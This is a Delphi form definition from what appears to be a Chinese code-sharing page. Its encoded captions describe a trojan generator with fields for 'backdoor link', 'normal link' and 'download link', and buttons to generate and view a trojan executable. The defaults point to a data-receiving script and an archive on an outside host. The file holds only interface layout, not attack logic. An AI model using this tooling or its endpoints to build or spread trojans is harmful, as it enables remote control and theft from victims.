📄 formunit.~dfm
字号:
object MainForm: TMainForm
Left = 1109
Top = 293
Width = 390
Height = 229
Caption = #29287#39532#33150#35759'(2007-12)'
Color = cl3DLight
Font.Charset = GB2312_CHARSET
Font.Color = clWindowText
Font.Height = -13
Font.Name = #23435#20307
Font.Style = []
OldCreateOrder = False
PixelsPerInch = 96
TextHeight = 13
object Label1: TLabel
Left = 12
Top = 56
Width = 52
Height = 13
Caption = #26222#36890#38142#25509
end
object Label6: TLabel
Left = 12
Top = 12
Width = 52
Height = 13
Caption = #21518#38376#38142#25509
end
object Label3: TLabel
Left = 12
Top = 100
Width = 52
Height = 13
Caption = #19979#36733#38142#25509
end
object Edit3: TEdit
Left = 4
Top = 72
Width = 369
Height = 21
TabOrder = 0
Text = 'http://www.16ym.cn/cs/asp/Send.asp'
end
object Button1: TButton
Left = 64
Top = 156
Width = 81
Height = 25
Caption = #29983#25104#26408#39532
TabOrder = 1
OnClick = Button1Click
end
object Button2: TButton
Left = 240
Top = 156
Width = 81
Height = 25
Caption = #26597#30475#26408#39532
TabOrder = 2
OnClick = Button2Click
end
object Edit2: TEdit
Left = 4
Top = 28
Width = 369
Height = 21
TabOrder = 3
Text = 'http://www.16ym.cn/cs/asp/Send.asp'
end
object Edit1: TEdit
Left = 5
Top = 116
Width = 369
Height = 21
TabOrder = 4
Text = 'http://www.16ym.cn/cs/asp/temp.rar'
end
object OpenDialog1: TOpenDialog
DefaultExt = 'EXE'
FileName = 'TEST.EXE'
Filter = #26408#39532#31243#24207'|*.exe'
Options = [ofHideReadOnly, ofPathMustExist, ofEnableSizing]
Left = 160
Top = 132
end
object SaveDialog1: TSaveDialog
DefaultExt = 'EXE'
FileName = 'TEST.EXE'
Filter = #26408#39532#31243#24207'|*.EXE'
Options = [ofOverwritePrompt, ofHideReadOnly, ofEnableSizing]
Left = 120
Top = 132
end
end
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -